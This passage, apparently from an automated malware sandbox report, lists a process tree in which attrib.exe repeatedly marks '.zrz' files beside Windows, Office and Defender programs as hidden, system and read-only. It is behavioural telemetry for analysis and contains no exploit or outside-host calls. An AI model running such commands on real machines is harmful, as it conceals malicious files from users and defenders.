        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:472
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
        6⤵
        
        PID:2848
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
        6⤵
        
        PID:3000
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
        6⤵
        
        PID:2288
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
        6⤵
        
        PID:2284
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
        6⤵
        
        PID:1332
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
        6⤵
        
        PID:2068
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
        6⤵
        Sets file to hidden
        
        PID:2588
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
        6⤵
        
        PID:1720
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
        6⤵
        
        PID:2120
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
        6⤵
        
        PID:1732
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wab.zrz"
        6⤵
        
        PID:2452
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wabmig.zrz"
        6⤵
        
        PID:2304
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\setup_wm.zrz"
        6⤵
        
        PID:2724
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\WinMail.zrz"
        6⤵
        
        PID:1748
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmlaunch.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:1124
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpconfig.zrz"
        6⤵
        
        PID:736
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\WMPDMC.zrz"
        6⤵
        
        PID:3060
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpenc.zrz"
        6⤵
        
        PID:972
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmplayer.zrz"
        6⤵
        Sets file to hidden
        
        PID:2288
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmprph.zrz"
        6⤵
        
        PID:2068
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpshare.zrz"
        6⤵
        
        PID:936
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows NT\Accessories\wordpad.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:2272
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.zrz"
        6⤵
        
        PID:2188
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Sidebar\sidebar.zrz"
        6⤵
        
        PID:1416
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\SMSvcHost\04d794428d635f6a82ac57dd3d6f3628\SMSvcHost.ni.zrz"
        6⤵
        
        PID:2140
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v2.0.50727_64\WsatConfig\36ca2928b2191011831ab673861c6ac6\WsatConfig.ni.zrz"
        6⤵
        Sets file to hidden
        
        PID:2364
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\2bd538d545e15452202ef3b41080e2ce\ComSvcConfig.ni.zrz"
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\261c09179eae03d67c9b6f3e70b603bd\dfsvc.ni.zrz"
        6⤵
        
        PID:2540
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\df459c0a2762c33e0699703f186b1751\Microsoft.Workflow.Compiler.ni.zrz"
        6⤵
        Sets file to hidden
        
        PID:2188
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\b93c627ec2e15c2675bcc81edafb10be\MSBuild.ni.zrz"
        6⤵
        
        PID:2208
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\e88db1688b08fbb889b0b9d4b1a51493\SMSvcHost.ni.zrz"
        6⤵
        
        PID:1572
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\537950d9c71af966e1d8c9deb550f842\WsatConfig.ni.zrz"
        6⤵
        
        PID:2856
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\9a69a26417a09c2d9d7f67bf7592bd74\ComSvcConfig.ni.zrz"
        6⤵
        
        PID:2808
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\bb4a1994db088e84b9d383271b082250\dfsvc.ni.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:3012
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\5ada68cfa2258a2d4e3c3779106faf9b\Microsoft.Workflow.Compiler.ni.zrz"
        6⤵
        
        PID:2036
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\f4a88265ac4ad47978daef8c5482fd30\MSBuild.ni.zrz"
        6⤵
        
        PID:3052
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\SMSvcHost\0b4d4e172e8054cb61d27f5ab9e0e445\SMSvcHost.ni.zrz"
        6⤵
        
        PID:1200
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\assembly\NativeImages_v4.0.30319_64\WsatConfig\9683999d889dc0b8782c782e2fc1aee5\WsatConfig.ni.zrz"
        6⤵
        
        PID:2860
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.zrz"
        6⤵
        
        PID:2180
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Boot\PCAT\memtest.zrz"
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\CreateDisc\SBEServer.zrz"
        6⤵
        
        PID:2112
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\wow\ehexthost32.zrz"
        6⤵
        
        PID:1572
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehexthost.zrz"
        6⤵
        
        PID:1956
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehmsas.zrz"
        6⤵
        
        PID:2144
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehprivjob.zrz"
        6⤵
        
        PID:1680
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrec.zrz"
        6⤵
        
        PID:2200
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehsched.zrz"
        6⤵
        
        PID:2808
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrecvr.zrz"
        6⤵
        
        PID:808
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehshell.zrz"
        6⤵
        
        PID:3024
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehtray.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:3052
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehvid.zrz"
        6⤵
        
        PID:560
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\loadmxf.zrz"
        6⤵
        Sets file to hidden
        
        PID:2992
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcGlidHost.zrz"
        6⤵
        
        PID:1428
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McrMgr.zrz"
        6⤵
        
        PID:1656
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcspad.zrz"
        6⤵
        
        PID:2192
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcupdate.zrz"
        6⤵
        
        PID:1152
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\Mcx2Prov.zrz"
        6⤵
        
        PID:2180
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McxTask.zrz"
        6⤵
        
        PID:576
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\WTVConverter.zrz"
        6⤵
        Sets file to hidden
        
        PID:1660
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\RegisterMCEApp.zrz"
        6⤵
        
        PID:2616
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\MediaCenterWebLauncher.zrz"
        6⤵
        
        PID:2156
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\accicons.zrz"
        6⤵
        
        PID:1200
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\cagicon.zrz"
        6⤵
        
        PID:1820
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\grvicons.zrz"
        6⤵
        
        PID:1592
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\inficon.zrz"
        6⤵
        
        PID:1980
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\joticon.zrz"
        6⤵
        
        PID:2124
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.zrz"
        6⤵
        Sets file to hidden
        
        PID:2268
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\msouc.zrz"
        6⤵
        Sets file to hidden
        
        PID:1476
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        5⤵
        
        PID:1656
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        5⤵
        
        PID:884
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        5⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        5⤵
        
        PID:2588
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        5⤵
        
        PID:2236
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        5⤵
        
        PID:2508
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        5⤵
        Sets file to hidden
        
        PID:1320
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        5⤵
        
        PID:1080
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:1880
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        5⤵
        
        PID:1944
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        5⤵
        
        PID:1956
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2480
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        5⤵
        
        PID:2244
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        5⤵
        
        PID:2836
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        5⤵
        
        PID:2144
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        5⤵
        
        PID:3056
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        5⤵
        
        PID:2908
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        5⤵
        
        PID:3052
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
        5⤵
        
        PID:2736
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
        5⤵
        
        PID:1504
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
        5⤵
        
        PID:2860
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:2756
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
        5⤵
        
        PID:1688
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
        5⤵
        
        PID:2672
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
        5⤵
        
        PID:1152
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
        5⤵
        
        PID:2896
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
        5⤵
        
        PID:2928
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
        5⤵
        
        PID:740
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
        5⤵
        Sets file to hidden
        
        PID:368
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:1680
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
        5⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
        5⤵
        
        PID:2236
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
        5⤵
        
        PID:1532
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
        5⤵
        
        PID:600
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
        5⤵
        
        PID:2004
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
        5⤵
        
        PID:656
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
        5⤵
        
        PID:1648
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\VPREVIEW.zrz"
        5⤵
        
        PID:2664
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.zrz"
        5⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.zrz"
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.zrz"
        5⤵
        
        PID:2716
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.zrz"
        5⤵
        
        PID:2468
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:3056
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.zrz"
        5⤵
        
        PID:2088
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wab.zrz"
        5⤵
        
        PID:680
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wabmig.zrz"
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\WinMail.zrz"
        5⤵
        
        PID:1592
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\setup_wm.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:3028
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmlaunch.zrz"
        5⤵
        
        PID:156
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpconfig.zrz"
        5⤵
        
        PID:828
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\WMPDMC.zrz"
        5⤵
        
        PID:2732
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpenc.zrz"
        5⤵
        
        PID:2628
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmplayer.zrz"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2932
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmprph.zrz"
        5⤵
        Sets file to hidden
        
        PID:2792
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows NT\Accessories\wordpad.zrz"
        5⤵
        
        PID:432
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpshare.zrz"
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.zrz"
        5⤵
        
        PID:1908
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Sidebar\sidebar.zrz"
        5⤵
        
        PID:1344
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.zrz"
        5⤵
        
        PID:3060
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.zrz"
        5⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.zrz"
        5⤵
        
        PID:2908
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.zrz"
        5⤵
        
        PID:2692
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.zrz"
        5⤵
        Views/modifies file attributes
        
        PID:2672
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.zrz"
        5⤵
        
        PID:1448
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\Admin\AppData\Local\Temp\ose00000.zrz"
        5⤵
        
        PID:2388
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\Admin\AppData\Local\Temp\sys32.zrz"
        5⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\Admin\Downloads\UnpublishHide.zrz"
        5⤵
        
        PID:1136
